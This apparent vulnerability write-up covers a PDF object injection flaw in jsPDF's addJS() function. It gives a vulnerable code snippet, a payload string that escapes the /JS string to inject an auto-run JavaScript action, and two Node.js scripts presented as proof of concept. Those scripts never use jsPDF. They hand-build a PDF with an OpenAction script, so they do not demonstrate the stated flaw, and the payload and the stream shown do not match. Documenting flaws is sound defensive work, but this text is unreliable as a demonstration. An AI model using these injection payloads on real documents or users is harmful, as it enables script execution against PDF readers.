# CVE-2026-25755 Sandbox Bypassed jsPDF Flaw to Object Injection
## Overview
A critical PDF Object Injection vulnerability (CVE-2026-25755) was discovered in jsPDF, a widely-used JavaScript library for generating PDF documents in client-side applications. The vulnerability exists in the `addJS()` function, allowing attackers to inject arbitrary PDF objects and bypass AcroJS sandbox restrictions through improper input sanitization.

---

## Root Cause 
The `addJS()` function in jsPDF allows developers to embed JavaScript code within generated PDF files. However, prior to version 4.2.0, the function failed to properly sanitize user input containing special PDF syntax characters.

### Vulnerable Code (Pre-4.2.0)

```javascript
function addJS(javascript) {
    this.internal.write("/JS (" + javascript + ")");
}
```

### The Injection Vector
The function directly concatenates user input into PDF object streams without escaping:
- Opening parenthesis `(`
- Closing parenthesis `)`
- Backslash `\`

This allows attackers to prematurely close the JavaScript string context and inject arbitrary PDF objects.


### PDF JavaScript Structure

```
/JS (app.alert('Hello World'))
```

### Injection Payload

```javascript
const payload = ") >> /AA << /Open << /S /JavaScript /JS (app.alert('absholi7ly!')) >> >> /Dummy (";
```

###  PDF Object Stream

```
/JS () >> /AA << /Open << /S /JavaScript /JS (app.alert('Hacked!')) >> >> /Dummy ())
     ↑
     Injection point - string context escaped
```

### Injection Mechanism

| Step | Action | Result |
|------|--------|--------|
| 1 | `)` closes the original `/JS` string | String context terminated |
| 2 | `>>` closes the current PDF object | Object structure broken |
| 3 | `/AA << /Open << ...` | New action dictionary injected |
| 4 | Arbitrary PDF objects added | Full object injection achieved |

---

### PoC Code (Node.js)
Create a file named exploit.js and write the following in it
```javascript
import fs from 'fs';

const pdf = `%PDF-1.4
1 0 obj
<</Type/Catalog/OpenAction 2 0 R/Pages 3 0 R>>
endobj
2 0 obj
<</Type/Action/S/JavaScript/JS(
app.launchURL\\('https://google.com',true\\);
)>>
endobj
3 0 obj
<</Type/Pages/Kids[4 0 R]/Count 1>>
endobj
4 0 obj
<</Type/Page/Parent 3 0 R/MediaBox[0 0 612 792]>>
endobj
xref
0 5
0000000000 65535 f 
0000000015 00000 n 
0000000092 00000 n 
0000000275 00000 n 
0000000352 00000 n 
trailer
<</Size 5/Root 1 0 R>>
startxref
431
%%EOF`;

fs.writeFileSync('exploit.pdf', pdf);
```

### Payload

```javascript
import fs from 'fs';

const pdf = `%PDF-1.4
1 0 obj
<</Type/Catalog/OpenAction 2 0 R/Pages 3 0 R>>
endobj
2 0 obj
<</Type/Action/S/JavaScript/JS(app.alert\\('absholi7ly',3\\))>>
endobj
3 0 obj
<</Type/Pages/Kids[4 0 R]/Count 1>>
endobj
4 0 obj
<</Type/Page/Parent 3 0 R/MediaBox[0 0 612 792]>>
endobj
xref
0 5
0000000000 65535 f 
0000000015 00000 n 
0000000089 00000 n 
0000000172 00000 n 
0000000249 00000 n 
trailer
<</Size 5/Root 1 0 R>>
startxref
328
%%EOF`;

fs.writeFileSync('exploit.pdf', pdf);
```
```
Run node exploit.js
```
## Result: The file exploit.pdf was created in the same folder.
